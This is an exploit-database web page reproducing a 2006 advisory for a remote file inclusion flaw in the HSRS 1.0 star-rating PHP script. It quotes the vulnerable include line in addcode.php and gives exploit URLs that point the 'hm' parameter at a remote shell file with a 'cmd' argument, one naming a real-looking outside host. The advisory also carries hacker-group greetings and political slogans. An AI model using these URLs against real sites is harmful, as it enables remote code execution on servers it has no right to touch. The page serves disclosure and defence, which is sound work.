Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
HSRS - exploit.company
header-logo
Suggest Exploit
vendor:
HSRS
by:
CoLd Zero
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: HSRS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2006

HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php) Remote File Include Vulnerability

The HSRS 1.0 (HIOX Star Rating System Script) is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from remote servers.

Mitigation:

Update to a patched version of the script or apply appropriate input validation and sanitization to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------


HSRS <= 1.0 (HIOX Star Rating System Script) (addcode.php)  Remote File
Include Vulnerability



Found By  :  CoLd Zero  [ Wasem898 ]

Source    :  include_once ($4AZHAR_TeAM."Securty.");

            require ($SpECiALPowEr.oRg_TeAm."Securty");

            A_mal Hackeing Team _ Hacking



PalesTine Arab Muslim Hacker

http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif

######################################################
#
#            HSRS 1.0 (HIOX Star Rating System Script)
#
# Class:     Remote File Include Vulnerability
# Published  2006-11-23
# Remote:    Yes
# Type:      High
# Site:      http://www.hscripts.com/scripts/php/downloads/HSRS.zip
#
# Author:    Cold Zero
# Contact:   c.o.1.d.0@hotmail.com
#
######################################################

About :
FREE Five Star Rating System Script that can be added in any web page with
php support.
A database based script developed using php and javascript.
This give your users a chance to rate on your articles, tutorials, photos,
images or whatever you want on a scale of 1-5 stars.

==========================

file ;

addcode.php

==========================

 include "$hm/auth/config.php";

======================================================
Example:

http://www.jusmail.com/5000/HSRS/addcode.php?hm=http://www.violatorthrash.com/flyers/cold.txt?cmd

======================================================
Exploit :

Http://www.Victem.0/[PaTH]/addcode.php?hm=http://coldzero.shell?cmd


======================================================

----  GreeTz: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] [o0xxdark0o[ [OrGanza] [H@mLiT] [Snake12][Root Shell]
              [Metoovit] [Fucker_net] [Rageb][CoDeR] [HuGe][Str0ke] [Dr.TaiGaR[ [JEeN HacKer] [Nazy L!unx[


****************************************************************
# *www.4azhar.com Securty Team    >>      www.4azhar.com        *
# *SpeciaL PoweR SecuritY Team    >>      www.specialpower.org  *
# *A_mal Hacking Team             >>      -vv -l -p The-Pradise *
*****************************************************************


http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif


--------------------------------------||    Viva Palestine ||-----------------------------------------
--------------------------------------||  Free Saddam Hussien ||-----------------------------------------

# milw0rm.com [2006-11-23]

Navigation

Suggest Exploit

Services By CQR